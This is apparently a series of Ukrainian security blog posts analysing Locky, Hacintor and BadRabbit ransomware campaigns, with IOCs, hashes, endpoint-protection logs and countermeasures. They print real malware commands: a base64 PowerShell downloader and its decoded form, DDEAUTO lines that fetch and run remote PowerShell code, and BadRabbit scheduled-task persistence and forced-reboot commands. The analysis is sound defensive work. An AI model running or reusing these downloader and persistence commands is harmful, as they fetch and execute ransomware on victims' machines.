JAB1AHIAbABzACAAPQAgACIAaAB0AHQAcAA6AC8ALwByAG8AcwBpAGEAdQB0AG8AcwB1AGwAaQAuAGgAdQAvAEgAVQBnAGYAcgBzAGUANwAiACwAIgBoAHQAdABwADoALwAvAGMAcQBhAHEAdQBhAGwAaQB0AGUALgBjAG8AbQAvAEgAVQBnAGYAcgBzAGUANwAiACwAIgBoAHQAdABwADoALwAvAGQAaQBlAHQAZQByAGQAdQByAHMAdABpAGcALgBkAGUALwBIAFUAZwBmAHIAcwBlADcAIgAsACIAaAB0AHQAcAA6AC8ALwBlAGQAaQBmAGkAYwBpAG8AZQB4AHAAbwAuAGMAbwBtAC8ASABVAGcAZgByAHMAZQA3ACIALAAiAGgAdAB0AHAAOgAvAC8AZgBpAHIAcwB0AC0AcABhAHIAaQBzAC0AcAByAG8AcABlAHIAdABpAGUAcwAuAGMAbwBtAC8ASABVAGcAZgByAHMAZQA3ACIALAAiAGgAdAB0AHAAOgAvAC8AaABvAHQAZQBsAHgAYQBnAHUAYQB0AGUALgBjAG8AbQAvAEgAVQBnAGYAcgBzAGUANwAiAA0ACgBmAG8AcgBlAGEAYwBoACgAJAB1AHIAbAAgAGkAbgAgACQAdQByAGwAcwApAHsADQAKAFQAcgB5AA0ACgB7AA0ACgAJAFcAcgBpAHQAZQAtAEgAbwBzAHQAIAAkAHUAcgBsAAkADQAKAAkAJABmAHAAIAA9ACAAIgAkAGUAbgB2ADoAdABlAG0AcABcAGgAdABpADQALgBlAHgAZQAiAAkADQAKAAkAVwByAGkAdABlAC0ASABvAHMAdAAgACQAZgBwAA0ACgAJACQAdwBjACAAPQAgAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABTAHkAcwB0AGUAbQAuAE4AZQB0AC4AVwBlAGIAQwBsAGkAZQBuAHQADQAKAAkAJAB3AGMALgBEAG8AdwBuAGwAbwBhAGQARgBpAGwAZQAoACQAdQByAGwALAAgACQAZgBwACkADQAKAAkAUwB0AGEAcgB0AC0AUAByAG8AYwBlAHMAcwAgACQAZgBwAA0ACgAJAGIAcgBlAGEAawANAAoAfQANAAoAQwBhAHQAYwBoAA0ACgB7AA0ACgAgACAAIABXAHIAaQB0AGUALQBIAG8AcwB0ACAAJABfAC4ARQB4AGMAZQBwAHQAaQBvAG4ALgBNAGUAcwBzAGEAZwBlAA0ACgB9AA0ACgANAAoACQANAAoAfQA=

Якщо декодувати отримаємо:

$urls = "h11p:\rosiautosuli.hu/HUgfrse7","h11p:\cqaqualite[.]com/HUgfrse7","h11p:\dieterdurstig.de/HUgfrse7",
"h11p:\edificioexpo[.]com/HUgfrse7","h11p:\first-paris-properties[.]com/HUgfrse7","h11p:\hotelxaguate[.]com/HUgfrse7" 
foreach($url in $urls){
Try
{
Write-Host $url
$fp = "$env:temp\hti4.exe"
Write-Host $fp
$wc = New-Object System.Net.WebClient
$wc.DownloadFile($url, $fp)
Start-Process $fp
break
}
Catch
{
   Write-Host $_.Exception.Message
}
}

Цього разу, на відміну від попередніх скрипт містить цілих 6 посилань на проміжний payload.

Для нас, з точки зору захисту систем, важливе те, що запуск цієї команди призводить до завантаження основного тіла з одної із шести переданих адрес та запис тіла у каталог %temp%

Filename      HUgfrse7      >> tmp\hti4.exe
Size            263KiB (268992 bytes)
SHA256      42c403e7c6e811938b843c9ec915b1190ab7095b1451416ba5e65ff530d6d787

Це проміжний payload, він є так званим downloader`ом. Його функція – перевірка системи на відповідність заданим параметрам.

У випадку коли параметри системи задовольняють задані критерії цей шматок коду переходить до завантаження основного тіла Locky Ransomware

hti4.exe > h11p://spooner-motorsport[.]com/UIeu6fgue63

Цей файл розшифровується проміжним payload`ом та запускається на виконання

Filename        23lfo837.exe
Size               597KiB (610816 bytes)
SHA256          ad0a072948cd6dfa2bd7aa79931b0522084ad8d2b9b4e119b4b9c6ef4a1ae89c

Після запуску відбувається процес шифрування файлів.

Зашифровані файли отримують розширення .asasin 

Цей зразок також містить механізм розповсюдження по мережі використовуючи вразливість SMB (EthernalBlue).

Тому достатньо щоб в організації знайшлася хоча би одна довірлива жертва і відсутність виправлень на MS10-017.

Детект по GTI

Робота правила Access Protection

Додаткові (вбудовані) правила Acces Protection які могли би зупинити інфікування

(перед запуском DDE навмисне були переведені в режим LogOnly)

Would be blocked by Access Protection rule (rule is currently not enforced) APM11\operator C:\PROGRAM FILES (X86)\MICROSOFT OFFICE\OFFICE15\WINWORD.EXE C:\WINDOWS\SYSWOW64\CMD.EXE User-defined Rules:_DDE_BLK_1(cmd) Action blocked : Read
Would be blocked by port blocking rule (rule is currently not enforced) C:\WINDOWS\SYSWOW64\WINDOWSPOWERSHELL\V1.0\POWERSHELL.EXE Common Maximum Protection:Prevent HTTP communication 91.142.213.150:80
Would be blocked by Access Protection rule (rule is currently not enforced) APM11\operator C:\WINDOWS\SYSWOW64\WINDOWSPOWERSHELL\V1.0\POWERSHELL.EXE C:\TMP\HTI4.EXE User-defined Rules:tmp_exe_BLK Action blocked : Create
Would be blocked by Access Protection rule (rule is currently not enforced) APM11\operator C:\WINDOWS\SYSWOW64\WINDOWSPOWERSHELL\V1.0\POWERSHELL.EXE HKCU\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\INTERNET SETTINGS\ZONEMAP\AUTODETECT Anti-spyware Standard Protection:Protect Internet Explorer favorites and settings Action blocked : Create
Would be blocked by Access Protection rule (rule is currently not enforced) APM11\support C:\USERS\OPERATOR\DESKTOP\P2.EXE C:\TMP\HTI4.EXE User-defined Rules:tmp_exe_BLK Action blocked : Read
Would be blocked by Access Protection rule (rule is currently not enforced) APM11\operator C:\TMP\HTI4.EXE C:\TMP\HTI4.EXE User-defined Rules:tmp_exe_BLK Action blocked : Read
Would be blocked by Access Protection rule (rule is currently not enforced) APM11\operator C:\TMP\HTI4.EXE C:\TMP\HTI4.EXE User-defined Rules:tmp_exe_BLK Action blocked : Read
Would be blocked by Access Protection rule (rule is currently not enforced) APM11\operator C:\TMP\HTI4.EXE C:\TMP\HTI4.EXE User-defined Rules:tmp_exe_BLK Action blocked : Read

Що можна було зробити аби уникнути інфікування ?

  1. Деактивувати оновлення посилань (DDE) – (DWORD) DontUpdateLinks = 1 (HCU\Software\Microsoft\Office\xx\Word\Options\)
  2. Заборонити процесам MS Office створювати дочірні процеси (політики Access Protection)
  3. Заборонити для процесів PowerShell доступ до мережі Інтернет (по аналогії із першим варіантом) – але цього не буде достатньо якщо powershell викинуть із схеми
  4. Заборонити створення та зчитування/запуску *.EXE з каталогів профілю користувача %appdata% (політики VSE/ENS – Access Protection)

Мережеві IOC:

завантаження списку адрес

91.142.213.150:80 HTTP 139 localesynavesalquiler[.]com GET /kdjsw23FGS HTTP/1.1
89.140.72.153:80 HTTP 129 lopezfranco[.]com GET /kdjsw23FGS HTTP/1.1

перебір джерел проміжного payload

87.229.45.38:80 HTTP 127 rosiautosuli[.]hu GET /HUgfrse7 HTTP/1.1
216.250.115.36:80 HTTP 126 cqaqualite[.]com GET /HUgfrse7 HTTP/1.1 
88.80.210.150:80 HTTP 128 dieterdurstig[.]de GET /HUgfrse7 HTTP/1.1
94.23.221.122:80 HTTP 128 edificioexpo[.]com GET /HUgfrse7 HTTP/1.1
151.80.157.121:80 HTTP 138 first-paris-properties[.]com GET /HUgfrse7 HTTP/1.1

завантаження кодованого тіла Locky

77.72.150.42:80   HTTP 147 spooner-motorsport[.]com GET /UIeu6fgue63 HTTP/1.1

Контрзаходи:

  • Заборона створення дочірніх процесів для додатків MS Office
  • Деактивація DDE (через параметр реєстру) або груповими політиками
  • Заборона доступу до мережі Інтернет для powershell – не надійно, бо DDE не обмежується передачею команд тільки на powershell
  • Заборона створення та зчитування/запуску *.EXE з каталогів профілю користувача %appdata%, а не лише у %temp% !
  • Розгортання механізмів т.з. “білих списків” для захисту від виконання несанкціонованого коду (на серверах/критичних системах)
  • Розгортання комплексу захисту McAfee ATD + ENS ATP + MAR для перевірки та блокування файлів із невідомою репутацією
  • Співбесіди з персоналом на тему сучасних цільових/масових атак із застосуванням фішингу та соц. інженерії

Будьте уважні та обережні!

VR

IOC_badrabbit_241017

Доброї ночі, панове.

Вчорашню паніку і проблеми викликала кампанія з розповсюдження фейкових Flash PLayer Update яку охрестили #BadRabbit

Рівень загрози – реально низький. Запуск і виконання вимагають прав Адміністратора.

Це кампанія з розсилки ransomware який використовує схожий код на Petya_A.

Розповсюдження по мережі – через SMB (EthernalBlue/MS17-010 не підтверджується – в код зашитий перелік тупих обліковиї даних + можливо використання Mimikatz для отримання логінів та паролей, використання вразливості SMB не підтверджується.

Користувачі захисту кінцевих точок McAfee (VSE/ENS) зауважте, що dropper та payload вже детектуются по GTI.

Схема атаки:

URL > script > fake FlashUpdate > GET php (exe) > %temp%\*.exe > C:\Windows\system32\rundll32.exe C:\Windows\infpub.dat,#1 15

Маркери IOC:

Скомпрометовані сайти містили скрипти на сповіщення про начеб-то необхідність оновлення FlashPlayer

Якщо жертва погоджувалась відбувалось завантаження dropper з сайт (зараз вже недоступний)

h11p:///1dnscontrol[.]com/flash_install.php   5.61.37.209

 

File name flash_install.php 
File size 431.54 KB
SHA-256 630325cac09ac3fab908f903e3b00d0dadd5fdaa0875ed8496fcbb97a558d0da

Ще раз - його запуск вимагає адмін привілеїв!!!

Це означає що при його запуску іде віконце UAC і користувач підтверджує що йому це потрібно.

Достатньо однієї жертви і не закритої вразливості SMB.

Після запуску видобуває з себе dll за шляхом

C:\Windows\infpub.dat

запускає через rundll32

C:\Windows\system32\rundll32.exe C:\Windows\infpub.dat,#1 15

закріплює себе через системний планувальник

schtasks  /Delete /F /TN rhaegal

schtasks  /Create /RU SYSTEM /SC ONSTART /TN rhaegal /TR “C:\Windows\system32\cmd.exe /C Start \”\” \”C:\Windows\dispci.exe\” -id 2361074427 && exit”

 

File name dispci.exe
File size 139.5 KB
HA-256 8ebc97e05c8e1073bda2efb6f4d00ad7e789260afa2c276f0c72740b838a0a93

додає задачу на перезавантаження

schtasks  /Create /SC once /TN drogon /RU SYSTEM /TR “C:\Windows\system32\shutdown.exe /r /t 0 /f” /ST 13:40:00

та запускає процес перебору локальних IP систем-сусідів на наявність вразливості SMB

“C:\Windows\8FA9.tmp” \\.\pipe\{42882875-162C-4F72-B1CD-0F1D1C1428C1}

Спершу шифруються файли по масці за розширенням, потім перезавантаження системи задачею.

Після перезавантаження MBR затирається.

Все досить тупо, примітивно і жодних слідів складної атаки

Що можна було зробити аби уникнути інфікування ?

  1. Запровадити веб фільтрацію (ENS WebControl або MWG + GTI)
  2. Заборонити користувачам самотужки встановлювати додатки
  3. Заборонити створення та зчитування/запуску *.EXE з каталогів профілю користувача %appdata% (політики VSE/ENS – Access Protection)
  4. Встановити оновлення MS17-010

Мережеві IOC:

завантаження dropper badrabbit

5.61.37.209:80   HTTP 157 1dnscontrol[.]com GET /flash_install.php HTTP/1.1 (вже недоступний)

Контрзаходи:

  • Перевірка журналів задач на наявність rhaegal та drogon
  • Запровадження механізмів веб-фільтрації (ENS WebControl або MWG + GTI)
  • Позбавлення користувачів адміністративних привілеїв
  • Використання Noscript або механізмів Web Gateway
  • Видалення FlashPLayer там де він не потрібен по роботі
  • Встановлення виправлень вразливості SMB
  • Заборона створення та зчитування/запуску *.EXE з каталогів профілю користувача %appdata%, а не лише у %temp% !
  • Розгортання механізмів т.з. “білих списків” для захисту від виконання несанкціонованого коду (на серверах/критичних системах)
  • Розгортання комплексу захисту McAfee ATD + ENS ATP + MAR для перевірки та блокування файлів із невідомою репутацією
  • Співбесіди з персоналом на тему сучасних цільових/масових атак із застосуванням фішингу та соц. інженерії

Додаткова інформація та джерела:

  1. ‘BadRabbit’ Ransomware , McAfee
  2. roycewilliams/badrabbit-info.txt
  3. #BadRabbit Yara Rule
  4. MS – Ransom:Win32/Tibbar.A

P.S.

Фахівцям державних організацій до уваги – від такого вектору розповсюдження варіант “вимкнути поштові сервери” не рятує.Почніть вже займатися менеджментом вразливостей і відберіть у користувачів права.. І заблокуйте в кінці кінців запуск із каталогу профілю!
Будьте уважні та обережні!

VR

DDE_Locky

Чув дзвін та не знаю де він…
Зразок Locky який доставляли сьогодні через механізм DDE не був націлений на українські системи.
Принаймні завантажувати основну шифруючу частину для мене він відмовився – це все відлуння західних кампаній
Люди, котрі дослухалися до моїх рекомендацій можуть спати спокійно.
Люди у яких GTI працює – теж, бо payload детектиться по GTI
Нагадую що Locky дає ось таку картинку:
А сьогоднішню (ой вже вчорашню паніку викликала кампанія #BadRabbit – fake flash update) – про неї буде наступний допис
А це в свою чергу означає що зразки документів із DDE не мають відношення до вчорашнього інциденту.
DDE окремо, а BadRabbit – окремо.
Але про всяк випадок дам вам деталі по всім DDE документам-приманкам які мені надсилали, коротко
Invoice_file_63539
DDEAUTO C:\\Windows\\System32\\cmd.exe "/k powershell.exe -NonI -noexit -NoP -sta $sr=(new-object IO.StreamReader ((([Net.WebRequest]::Create(' h11p://transmercasa[.]com/JHGGsdsw6')).GetResponse()).GetResponseStream())).ReadToEnd();powershell.exe -e $sr"  
C:\Windows\System32\cmd.exe /k powershell.exe -NonI -noexit -NoP -sta $sr=(new-object IO.StreamReader ((([Net.WebRequest]::Create(' h11p://transmercasa[.]com/JHGGsdsw6')).GetResponse()).GetResponseStream())).ReadToEnd();powershell.exe -e $sr
75.98.175.70 80 HTTP 129 transmercasa[.]com GET /JHGGsdsw6 HTTP/1.1
151.236.60.40 80 HTTP 133 tatianadecastelbajac[.]fr GET /kjhgFG HTTP/1.1
зразок описаний в повідомленні CERT_UA
Invoice_file_06565.doc
DDEAUTO C:\\Windows\\System32\\cmd.exe "/k powershell.exe -NonI -noexit -NoP -sta $sr=(new-object IO.StreamReader ((([Net.WebRequest]::Create('h11p://urcho[.]com/JHGGsdsw6')).GetResponse()).GetResponseStream())).ReadToEnd();powershell.exe -e $sr"  
C:\Windows\System32\cmd.exe /k powershell.exe -NonI -noexit -NoP -sta $sr=(new-object IO.StreamReader ((([Net.WebRequest]::Create('h11p://urcho[.]com/JHGGsdsw6')).GetResponse()).GetResponseStream())).ReadToEnd();powershell.exe -e $sr

87.106.69.81 80 HTTP 122 urcho[.]com GET /JHGGsdsw6 HTTP/1.1
151.236.60.40 80 HTTP 133 tatianadecastelbajac[.]fr GET /kjhgFG HTTP/1.1

зразки з минулого тижня - блокуйте DDE бо посилань згенерують тисячі тисяч
I_213380.doc 
DDE C:\\Windows\\System32\\cmd.exe "/k powershell -NoP -sta -NonI -w hidden $e=(New-Object System.Net.WebClient).DownloadString('h11p://ryanbaptistchurch.com/KJHDhbje71');powershell -e $e "  

I_303643.doc
DDE C:\\Windows\\System32\\cmd.exe "/k powershell -NoP -sta -NonI -w hidden $e=(New-Object System.Net.WebClient).DownloadString('h11p://arkberg-design.fi/KJHDhbje71');powershell -e $e "  

I_489192.doc
DDE C:\\Windows\\System32\\cmd.exe "/k powershell -NoP -sta -NonI -w hidden $e=(New-Object System.Net.WebClient).DownloadString('h11p://arkberg-design.fi/KJHDhbje71');powershell -e $e "  

I_535073.doc
DDE C:\\Windows\\System32\\cmd.exe "/k powershell -NoP -sta -NonI -w hidden $e=(New-Object System.Net.WebClient).DownloadString('h11p://arkberg-design.fi/KJHDhbje71');powershell -e $e "  

DC0003342.doc 
DDE C:\\Windows\\System32\\cmd.exe "/k powershell -NoP -sta -NonI -w hidden $e=(New-Object System.Net.WebClient).DownloadString('h11p://pragmaticinquiry.org/hjergf76');powershell -e $e "  

20170927_954285.doc 
DDE C:\\Windows\\System32\\cmd.exe "/k powershell -NoP -sta -NonI -w hidden $e=(New-Object System.Net.WebClient).DownloadString('h11p://sene-gal.de/cijweh78fDFA');powershell -e $e "  

- крайні два це вже не Locky а Hacintor але різниці особливої немає
Блокуйте DDE і створення екзешників в %temp%

Контрзаходи:

  • Деактивація DDE (через параметр реєстру) або груповими політиками
  • Заборона створення дочірніх процесів для додатків MS Office
  • Заборона доступу до мережі Інтернет для powershell – не надійно, бо DDE не обмежується передачею команд тільки на powershell
  • Заборона створення та зчитування/запуску *.EXE з каталогів профілю користувача %appdata%, а не лише у %temp% !
  • Розгортання механізмів т.з. “білих списків” для захисту від виконання несанкціонованого коду (на серверах/критичних системах)
  • Розгортання комплексу захисту McAfee ATD + ENS ATP + MAR для перевірки та блокування файлів із невідомою репутацією
  • Співбесіди з персоналом на тему сучасних цільових/масових атак із застосуванням фішингу та соц. інженерії

Будьте уважні та обережні!

VR